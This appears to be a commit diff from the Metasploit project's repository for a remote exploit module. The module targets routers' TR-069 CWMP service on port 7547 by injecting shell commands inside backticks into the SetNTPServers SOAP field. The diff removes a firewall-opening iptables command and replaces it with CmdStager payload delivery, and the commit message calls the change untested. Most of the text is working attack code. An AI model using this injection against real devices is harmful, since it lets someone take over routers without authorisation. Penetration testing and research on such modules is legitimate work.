Use CmdStager instead
Oh, and this is totally untested as of this commit.bug/bundler_fix
Tod Beardsley
parent
8de17981c3
commit
4d6b2dfb46
|
|
@ -4,6 +4,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::CmdStager
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
|
@ -20,6 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Author' =>
|
||||
[
|
||||
'Kenzo', # Vulnerability discovery and original Metasploit module
|
||||
'Michael Messner <devnull[at]s3cur1ty.de>', # Copypasta from TheMoon msf module
|
||||
'todb', # Metasploit module
|
||||
'wvu' , # Metasploit module
|
||||
'0x27' # Metasploit module
|
||||
|
|
@ -54,34 +56,59 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(7547), # CWMP port
|
||||
Opt::RPORT(7547), # TR-069 CWMP port for SOAP/XML commands
|
||||
], self.class)
|
||||
|
||||
@data_cmd_template = "<?xml version=\"1.0\"?>"
|
||||
@data_cmd_template << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
|
||||
@data_cmd_template << " <SOAP-ENV:Body>"
|
||||
@data_cmd_template << " <u:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1\">"
|
||||
@data_cmd_template << " <NewNTPServer1>%s</NewNTPServer1>"
|
||||
@data_cmd_template << " <NewNTPServer2></NewNTPServer2>"
|
||||
@data_cmd_template << " <NewNTPServer3></NewNTPServer3>"
|
||||
@data_cmd_template << " <NewNTPServer4></NewNTPServer4>"
|
||||
@data_cmd_template << " <NewNTPServer5></NewNTPServer5>"
|
||||
@data_cmd_template << " </u:SetNTPServers>"
|
||||
@data_cmd_template << " </SOAP-ENV:Body>"
|
||||
@data_cmd_template << "</SOAP-ENV:Envelope>"
|
||||
end
|
||||
|
||||
def set_new_ntp_server(cmd)
|
||||
template = "<?xml version=\"1.0\"?>"
|
||||
template << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
|
||||
template << " <SOAP-ENV:Body>"
|
||||
template << " <u:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1\">"
|
||||
template << " <NewNTPServer1>`%s`</NewNTPServer1>" # Backticks, aw yeah
|
||||
template << " <NewNTPServer2></NewNTPServer2>"
|
||||
template << " <NewNTPServer3></NewNTPServer3>"
|
||||
template << " <NewNTPServer4></NewNTPServer4>"
|
||||
template << " <NewNTPServer5></NewNTPServer5>"
|
||||
template << " </u:SetNTPServers>"
|
||||
template << " </SOAP-ENV:Body>"
|
||||
template << "</SOAP-ENV:Envelope>"
|
||||
|
||||
template % cmd
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts)
|
||||
uri = '/UD/act?1'
|
||||
soapaction = "urn:dslforum-org:service:Time:1#SetNTPServers"
|
||||
injected_data = set_new_ntp_server(cmd)
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'uri' => uri,
|
||||
'ctype' => "text/xml",
|
||||
'method' => 'POST',
|
||||
'headers' => {
|
||||
'SOAPAction' => soapaction,
|
||||
},
|
||||
'data' => injected_data
|
||||
}, 2)
|
||||
return res
|
||||
rescue ::Rex::ConnectionError
|
||||
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
|
||||
end
|
||||
end
|
||||
|
||||
def check
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'uri' => '/globe'
|
||||
'uri' => '/globe' # TODO: Check this? Why not /UD/act?1
|
||||
})
|
||||
rescue ::Rex::ConnectionError
|
||||
vprint_error("A connection error has occured")
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
if res and res.code == 404 and res.body =~ /home_wan.htm/
|
||||
if res and res.code == 404 and res.body =~ /home_wan\.htm/
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
|
||||
|
|
@ -96,29 +123,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
print_status("Exploiting...")
|
||||
print_status("Dropping firewall on port 80...")
|
||||
execute_command("`iptables -I INPUT -p tcp --dport 80 -j ACCEPT`","")
|
||||
execute_command("tick.eircom.net","")
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts)
|
||||
uri = '/UD/act?1'
|
||||
soapaction = "urn:dslforum-org:service:Time:1#SetNTPServers"
|
||||
data_cmd = @data_cmd_template % "#{cmd}"
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'uri' => uri,
|
||||
'ctype' => "text/xml",
|
||||
'method' => 'POST',
|
||||
'headers' => {
|
||||
'SOAPAction' => soapaction,
|
||||
},
|
||||
'data' => data_cmd
|
||||
})
|
||||
return res
|
||||
rescue ::Rex::ConnectionError
|
||||
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
|
||||
end
|
||||
execute_cmdstager({:flavor => :echo})
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue